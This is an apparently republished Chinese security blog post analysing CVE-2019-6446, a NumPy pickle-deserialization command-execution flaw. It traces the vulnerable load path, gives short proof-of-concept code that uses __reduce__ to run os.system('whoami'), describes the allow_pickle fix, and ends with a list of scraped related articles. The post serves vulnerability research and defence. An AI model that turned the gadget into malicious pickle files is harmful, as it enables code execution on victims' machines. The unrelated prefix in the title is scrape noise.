wpf window 不执行show 就不能load执行_Numpy反序列化命令执行漏洞分析(CVE-2019-6446)附0day...
![](/assets/blank.gif)
1、介绍
NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算。NumPy 提供大量的 函数和操作,能够帮助程序员便利进行数值计算。在 NumPy 1.16.0 版本之前存在反序列化 命令执行漏洞,用户加载恶意的数据源造成命令执行。
2、环境 软件环境如下:
NumPy 1.16.0
Windows10
PyCharm 2018.3.2
3、漏洞分析
先来看漏洞的入口,lib/npyio.py 第 288 行附近。如图所示。
![](/assets/blank.gif)
通过 NumPy.lib.npyio.p 之中的load()方法加载序列化文件,通过 file 形参传入文件,由于allow_pickle=True,所以可以采用序列化文件。
再看漏洞触发位置,位置在 lib/npyio.py,第 418 行附近。由于在 windows下可能和其它系统下的行数位置存在差异,所以通过搜索_ZIP_PREFIX 变量就能快速定位到位置。为了方便阅读,我将无关的代码省略。
try:
# Code to distinguish from NumPy binary files and pickles.
_ZIP_PREFIX = b'PKx03x04'
_ZIP_SUFFIX = b'PKx05x06' # empty zip files start with this ……
if magic.startswith(_ZIP_PREFIX) or magic.startswith(_ZIP_SUFFIX): ……
elif magic == format.MAGIC_PREFIX: ……
else:
# Try a pickle
if not allow_pickle:
raise ValueError("Cannot load file containing pickled data "
"when allow_pickle=False")
try:
return pickle.load(fid, **pickle_kwargs)
except Exception:
raise IOError(
"Failed to interpret file %s as a pickle" % repr(file))
finally:……
能够看到这个代码是用于区分 NumPy 二进制文件和 pickles。默认格式要求 ZIP 文件前缀 PKx03x04 后缀 PKx05x06,如果不满足默认的格式,则会执行 pickle.load()方法。pickle 模块的作用是把 python 对象转换为字符串表示和字符串重构为对象,称之为封装和拆封或
为序列化和反序列化。通过查看 pickle 图表能够进一步了解模块,模块是由 BaseException、
pickle._Unpickler、pickle._Pickler、pickle._Franmer、pickle._Urfamer 组成,图表如下:
![](/assets/blank.gif)
紧接着跟进 pickle.load()方法,相关的方法在 pickle._Urpickler 之中,如图所示:
![](/assets/blank.gif)
跟入Lib/pickle.py 第 1060 行,如图所示:
![](/assets/blank.gif)
此处为反序列执行的方法,到此为漏洞的执行流程为: NumPy.lib.npyio.pyload()=>pickle.py load()
4、POC
默认情况下 allow_pickle=True,允许通过文件反序列化,POC 如下:
from numpy.lib import npyio
from numpy import __version__
print(__version__)
import os
class Test(object):
def __init__(self):
self.a = 1
def __reduce__(self):
return (os.system, ('whoami',))
if __name__ == '__main__':
tmpdaa = Test()
npyio.save("test",tmpdaa)
npyio.load("test.npy")或者可以通过 pickles,POC 如下:
from numpy.lib import npyio
from numpy import __version__
print(__version__)
import os
import pickle
class Test(object):
def __init__(self):
self.a = 1
def __reduce__(self):
return (os.system,('whoami',))
tmpdaa = Test()
with open("test-file.pickle",'wb') as f:
pickle.dump(tmpdaa,f)
npyio.load("test-file.pickle")
测试结果,如图所示:
![](/assets/blank.gif)
5、对比分析
这个漏洞让我想起了之前的反序列化问题,POC 通过构建对象、 reduce 魔法函数, 在 numpy.load()执行反序列化,之前漏洞 POC 如下:
import numpy
from numpy import __version__
print(__version__)
import os
import pickle
class Test(object):
def __init__(self):
self.a = 1
def __reduce__(self):
return (os.system,('whoami',))
tmpdaa = Test()
with open("test-file.pickle",'wb') as f:
pickle.dump(tmpdaa,f)
numpy.load('test-file.pickle')
漏洞触发原因:numpy/core/numeric.py第 2280 行,如图所示:
![](/assets/blank.gif)
![](/assets/blank.gif)
同样执行了反序列化,两者的利用非常相似,都是用的 pickle.load()。
6、防御修复
由于需要 allow_pickle=True,才可以执行反序列化,所以只要将 allow_pickle=False,就可以避免反序列化问题。NumPy 在 1.16.0 之后的版本进行了修复,修复如下:
![](/assets/blank.gif)
7、总结
CVE-2019-6446 漏洞给予我新的启发,看待漏洞不能仅看漏洞本身,对于不同的漏洞入口也很重要。个人觉得不同的入口算是新的利用思路披露对于认识漏洞是很有帮助。
8、附上 0Day
截止完稿时,这个漏洞还属于 0day,NumPy.ma.coreload 方法反序列化漏洞,如图所示:
![](/assets/blank.gif)
__________________________________________________________声明:本文章来自团队成员vr_system投稿,仅供白帽子、安全爱好者研究学习,对于用于非法途径的行为,发布者及作者不承担任何责任。我们建立了一个以知识共享为主的 免费 知识星球,旨在通过相互交流,促进资源分享和信息安全建设,为以此为生的工作者、即将步入此行业的学生等提供各自之力。为保持知识星球长久发展,所有成员需遵守本星球免费规则,鼓励打赏;同时保持每月分享至少一次资源(安全类型资源不限,但不能存在一切违法违规及损害他人利益行为),避免“伸手党”,即使新人我们也鼓励通过分享心得和笔记取得进步,“僵尸粉”将每月定期清理。
![](/assets/blank.gif)
wpf window 不执行show 就不能load执行_Numpy反序列化命令执行漏洞分析(CVE-2019-6446)附0day...相关推荐
- python pickle反序列化漏洞_Numpy反序列化命令执行漏洞分析(CVE-2019-6446) –vr_system...
1. 介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy提供大量的函数和操作,能够帮助 程序员 便利进行数值计算.在NumPy 1.16.0版本之前存在反序列化 ...
- java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...
- Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
- 03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞
文章目录 漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞 影响版本 漏洞原理 漏洞复现 环境准备 漏洞检测 漏洞利用 验证漏洞利用是否成功 修复建议 漏洞名称:Apereo CAS 4. ...
- 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...
- 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
- Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未 ...
- python批量上传执行脚本_python 写的批量操作远程主机脚本(命令执行,上传、下载文件)...
本帖最后由 Matthew0701 于 2011-4-28 21:45 编辑 最近在学习python,借助fabric模块写了个批量操作服务器的脚本,在此分享给大家,如有不足之处,欢迎大家指正 准备工 ...
- Apereo CAS 4.1 反序列化命令执行漏洞复现
文章目录 1. 前言 2. 利用 参考 1. 前言 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统.其4.1.7版本之前存在一处默认密钥的问题,利用这个默认 ...
最新文章
- 【python】app未注册用户自动筛选
- 找call写call_如何将Google Call Widget添加到任何网页
- linux安装mysql phpmyadmin_ubuntu mysql远程连接+phpmyadmin安装
- 华为二层创建vlan_二层交换机不同VLAN实现互通 (华为)
- 【会议】2009-11-13
- 开机时不输入用户名密码直接登录
- linux iops 监控,企业级监控软件使用zabbix key 监控IOPS状态
- 粉笔画粉笔字体样式_20多种很棒的粉笔字体可供下载
- python PIL Image 图像处理基本操作
- mysql:Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (111)解决方法
- 无线网和网吧服务器,网吧网络使用无线局域网的几个优势所在
- Win10 内置 OpenSSH 使用密钥连不上的问题解决
- innodb_flush_method 的理解
- ML-Agents学习之RollerBall项目
- 昂瑞微蓝牙芯片HS6620D调试记录
- 12 图浅析人口分布对经济趋势的影响
- SATA硬盘与IDE硬盘的优劣势对比
- 办公室装修办公隔断的注意事项
- 学习笔记:FPGA之三人表决器
- Docker(狂神)
热门文章
- T4((Text Template Transformation Toolkit))模版引擎之基础入门 C#中文本模板(.tt)的应用...
- 组件局域网中的无集线器、Windows XP、Windows 7、Windows 8的对等网
- 获取套接字相关联信息
- JavaScript URL参数读取
- vue cli3.0创项目报错‘This may cause things to work incorrectly. Make sure to use the same version for b’
- mac vscode 实用快捷键
- Object相关方法
- javascript --- js中的作用域 变量提升
- Spring Boot(十二)单元测试JUnit
- 每天一个linux命令(9):nl命令